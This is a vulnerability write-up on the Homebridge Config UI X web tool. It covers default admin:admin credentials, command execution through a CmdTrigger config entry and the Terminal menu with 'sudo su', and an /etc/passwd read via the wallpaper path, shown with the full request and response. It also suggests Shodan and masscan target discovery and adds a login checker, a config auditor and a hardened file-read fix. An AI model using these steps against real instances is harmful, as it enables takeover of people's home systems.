homebridge-config-ui-x: default creds, authenticated cmd exec and LFI

Homebridge Config UI X is a web based management tool for Homebridge that allows you to manage all aspects of your Homebridge setup. Around 90 instances show up on Shodan; scanning ports 8081 and 8181 with masscan may reveal more.

Summary

  1. Resources
  2. Default credentials
  3. Authenticated command exec
  4. Authenticated local file inclusion

1. Resources

2. Default credentials

admin:admin 
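A small checker for the default login, added here as an example (it is not part of the original post or of the homebridge-config-ui-x project). It assumes the UI authenticates with POST /api/auth/login, taking a JSON body with username and password and answering with a JSON object that carries an access_token; only the /api/auth/ prefix is confirmed by the wallpaper request later in the post, the rest is an assumption.

```python
"""Check a homebridge-config-ui-x instance for the admin:admin default login.

Added example, not code from the original post or from homebridge-config-ui-x.
ASSUMPTION: login is POST /api/auth/login with {"username": ..., "password": ...}
and a successful reply is a 2xx JSON object containing "access_token".
"""
import json
import sys
import urllib.error
import urllib.request

DEFAULT_CREDS = ("admin", "admin")


def http_post_json(url, body, timeout=10):
    """Send a JSON POST and return (status, decoded JSON or None).

    Connection failures come back as status 0 so a sweep over many hosts
    keeps going instead of dying on the first unreachable target.
    """
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        method="POST",
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as e:
        return e.code, None
    except urllib.error.URLError:
        return 0, None


def check_default_creds(base_url, creds=DEFAULT_CREDS, post=http_post_json):
    """Return True if base_url accepts the given credentials.

    `post` is injectable so the decision logic can be exercised without a
    live target. NestJS answers a POST with 201, so any 2xx is accepted.
    """
    username, password = creds
    status, data = post(
        base_url.rstrip("/") + "/api/auth/login",
        {"username": username, "password": password},
    )
    return 200 <= status < 300 and isinstance(data, dict) and "access_token" in data


if __name__ == "__main__":
    # Usage: python check_default_creds.py http://127.0.0.1:8080 http://10.0.0.5:8581
    for target in sys.argv[1:]:
        verdict = "DEFAULT CREDS ACCEPTED" if check_default_creds(target) else "ok"
        print(f"{target}: {verdict}")
```

Run it against a list of base URLs; a 2xx reply with a token means the instance still has the shipped password.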

3. Authenticated command exec

3.1 Using plugins

  • install Homebridge Cmdtrigger
  • add a cmdtrigger fake switch to the config
  • restart Homebridge
  • turn on and off the cmdtrigger accessories
Install Homebridge Cmdtrigger
Add a cmdtrigger fake switch to the config
  • Both execAfterDelay true and false seem to work, but the stateful option does not
{
    "bridge": {
        "name": "Homebridge 1185",
        "username": "0E:4A:23:BC:11:85",
        "port": 53750,
        "pin": "031-45-154"
    },
    "accessories": [
        {
            "accessory": "DummySwitch",
            "name": "My Stateful Switch 1",
            "stateful": true
        },
        {
            "accessory": "CmdTrigger",
            "name": "My command",
            "command": "echo 1 > /tmp/pwn",
            "delay": "10000",
            "execAfterDelay": false
        },
        {
            "accessory": "CmdTrigger",
            "name": "My command2",
            "command": "echo 1 > /tmp/pwn",
            "delay": "10000",
            "execAfterDelay": true
        }
    ],
    "platforms": []
}
Restart Homebridge to see the new switches appear in the accessories tab
Turn the accessories on and off to execute the command; it runs as the Homebridge process user, which in the Docker image is abc, as the owner of /tmp/pwn below shows
/tmp # ls -l
total 2
drwxr-xr-x    2 root     root          4096 Jul  1 12:19 npm-1-6b8e747f
-rw-r--r--    1 abc      abc              4 Jul  9 19:28 pwn
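An audit script for the config.json pattern above, added as an example (it is not the post's or Homebridge's own code). It flags CmdTrigger accessories and, as a generalisation that is an assumption rather than anything the post states, any accessory or platform entry carrying a command-like key; the post's config is embedded as the sample input.

```python
"""Audit a Homebridge config.json for accessories that execute shell commands.

Added example, not code from the original post or from Homebridge. The CmdTrigger
pattern is the one shown above; the list of command-like keys is an assumed
heuristic for other plugins and may produce false positives.
"""
import json
import sys

# Accessory types known from the post to run their "command" field as a shell command.
COMMAND_ACCESSORIES = {"CmdTrigger"}
# Keys plugins commonly use for a shell command. Only "command" is confirmed above;
# the rest is an assumption.
COMMAND_KEYS = ("command", "cmd", "on_cmd", "off_cmd", "exec", "script")

# The config.json from the post, embedded as sample input.
SAMPLE_CONFIG = """
{
    "bridge": {
        "name": "Homebridge 1185",
        "username": "0E:4A:23:BC:11:85",
        "port": 53750,
        "pin": "031-45-154"
    },
    "accessories": [
        {"accessory": "DummySwitch", "name": "My Stateful Switch 1", "stateful": true},
        {"accessory": "CmdTrigger", "name": "My command",
         "command": "echo 1 > /tmp/pwn", "delay": "10000", "execAfterDelay": false},
        {"accessory": "CmdTrigger", "name": "My command2",
         "command": "echo 1 > /tmp/pwn", "delay": "10000", "execAfterDelay": true}
    ],
    "platforms": []
}
"""


def _walk(node, path):
    """Yield (path, dict) for every dict nested anywhere inside node."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, path + [key])
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, path + [index])


def _fmt(path):
    """Render ["platforms", 0, "devices", 1] as platforms[0].devices[1]."""
    out = ""
    for part in path:
        out += f"[{part}]" if isinstance(part, int) else (f".{part}" if out else part)
    return out


def find_command_exec(config):
    """Return [(json path, reason, command)] for every entry that can run a command.

    Only the accessories and platforms sections are scanned; the bridge block
    holds no plugin configuration.
    """
    findings = []
    for section in ("accessories", "platforms"):
        for path, entry in _walk(config.get(section, []), [section]):
            kind = entry.get("accessory") or entry.get("platform")
            hits = [k for k in COMMAND_KEYS if isinstance(entry.get(k), str)]
            if kind in COMMAND_ACCESSORIES:
                reason = f"accessory type {kind} runs its command field"
            elif hits:
                reason = "command-like key(s): " + ", ".join(hits)
            else:
                continue
            findings.append((_fmt(path), reason, entry.get(hits[0]) if hits else None))
    return findings


def audit_text(text):
    """Parse a config.json document and return its findings."""
    return find_command_exec(json.loads(text))


if __name__ == "__main__":
    # Usage: python audit_config.py /path/to/config.json (defaults to the sample above)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    findings = audit_text(text)
    for where, reason, command in findings:
        print(f"{where}: {reason}: {command!r}")
    sys.exit(1 if findings else 0)
```

Running it on the sample prints the two CmdTrigger entries and exits non-zero; the DummySwitch is not reported. A change-detection job that diffs this output after every save through the UI catches the attack above without having to trust the UI's own logs.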

3.2 Terminal menu

Some builds of homebridge-config-ui-x (the Docker image, for instance) expose a Terminal menu option that gives OS command execution as the user abc inside the container. Privilege escalation to root inside the container works with sudo su. Note that this is root in the container only; breaking out to the Docker host is a separate step that this post does not cover.

4. Authenticated LFI

Strictly an arbitrary file read rather than an inclusion: the UI reads whatever file the configured wallpaper path points at and serves it, with an image content type, on the unauthenticated login page.

  • Change the wallpaper path
  • Log out and fetch the wallpaper background
  • The response body contains the file
Change the wallpaper path in the settings to the file to read (/etc/passwd in the example below)
Log out and, on the login page, find the wallpaper background request
GET /api/auth/wallpaper/09c6ba2f480dc7cb8e09412186954bb9339fd06ee9c5e43269854813e241698c.jpg HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: mybb[lastvisit]=1589131141; mybb[lastactive]=1589131310; loginattempts=1; mybbuser=1_q8fBwS6lmddMUJSMqYlBWLJoyfMzweQXQMQuNsj9BrMfErnkzr; io=ehh4f9ksFwSkHODbAAAA
Pragma: no-cache
Cache-Control: no-cache
Response body contains the file
HTTP/1.1 200 OK
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https://raw.githubusercontent.com https://user-images.githubusercontent.com; connect-src 'self' https://openweathermap.org https://api.openweathermap.org wss://127.0.0.1:8080 ws://127.0.0.1:8080 
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer
X-XSS-Protection: 1; mode=block
vary: Origin
access-control-allow-origin: false
cache-control: public,max-age=31536000,immutable
content-type: image/jpeg
Date: Sun, 30 Aug 2020 14:52:10 GMT
Connection: close
Content-Length: 1332

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:911:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
abc:x:1000:1000::/config:/bin/false
avahi:x:86:86:Avahi System User:/var/run/avahi-daemon:/sbin/nologin
messagebus:x:100:100:messagebus:/dev/null:/sbin/nologin
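The wallpaper endpoint reads the configured path and returns it with an image content type to anyone who loads the login page. The following added example (not code from the post or from homebridge-config-ui-x) shows that unsafe read next to a hardened version that confines the path to an allowed directory and checks image magic bytes, plus a client-side detector for the symptom above: an image/* response whose body is not an image. Function names, the allowed directory and the sample bodies are assumptions; /config is used as the allowed directory only because the dump above shows it as the abc user's home.

```python
"""Wallpaper file read: unsafe pattern, hardened server-side check, client-side detector.

Added example, not code from the original post or from homebridge-config-ui-x.
Function names, the allowed directory and the sample bodies are assumptions.
"""
import os

# Leading bytes of the image formats a wallpaper can reasonably be.
IMAGE_MAGIC = (
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"RIFF", "image/webp"),  # RIFF....WEBP, bytes 8..12 are checked below
)


def sniff_image(data):
    """Return the MIME type implied by the leading bytes, or None if not an image."""
    for magic, mime in IMAGE_MAGIC:
        if data.startswith(magic):
            if mime == "image/webp" and data[8:12] != b"WEBP":
                return None
            return mime
    return None


def _read_file(path):
    with open(path, "rb") as fh:
        return fh.read()


def unsafe_wallpaper(path, read=_read_file):
    """The vulnerable shape: the configured path is read and returned as-is with a
    fixed image type, which is how /etc/passwd came back labelled image/jpeg."""
    return "image/jpeg", read(path)


def safe_wallpaper(path, allowed_root, read=_read_file):
    """Return ("ok", mime, data) only if path resolves inside allowed_root and the
    content carries image magic; otherwise ("denied", reason, None).

    realpath resolves symlinks before the containment check, so a link placed
    under allowed_root that points at /etc/passwd is rejected as well, and
    commonpath (not a string prefix test) stops /configX from matching /config.
    """
    root = os.path.realpath(allowed_root)
    target = os.path.realpath(path)
    if os.path.commonpath([root, target]) != root:
        return "denied", f"{path!r} escapes {allowed_root!r}", None
    data = read(target)
    mime = sniff_image(data)
    if mime is None:
        return "denied", f"{path!r} is not an image", None
    return "ok", mime, data


def response_is_file_leak(content_type, body):
    """Client-side check: an image/* response whose body has no image magic bytes
    is most likely a leaked file, exactly the response captured above."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    return media_type.startswith("image/") and sniff_image(body) is None


# Constructed sample bodies: a minimal JPEG/JFIF header and the first line of the
# /etc/passwd dump shown above.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01"
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/ash\n"

if __name__ == "__main__":
    print(unsafe_wallpaper("/etc/passwd", read=lambda p: SAMPLE_PASSWD))
    print(safe_wallpaper("/etc/passwd", "/config", read=lambda p: SAMPLE_PASSWD))
    print(safe_wallpaper("/config/../etc/passwd", "/config", read=lambda p: SAMPLE_PASSWD))
    print(safe_wallpaper("/config/wall.jpg", "/config", read=lambda p: SAMPLE_JPEG))
    print(response_is_file_leak("image/jpeg", SAMPLE_PASSWD))
```

The containment check alone is not enough: a readable image-looking file outside the root is still blocked, and a non-image inside the root is still refused, so both halves are needed to stop the wallpaper setting from becoming a file reader. On the testing side, response_is_file_leak is the one-line triage for a captured wallpaper response like the one above.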
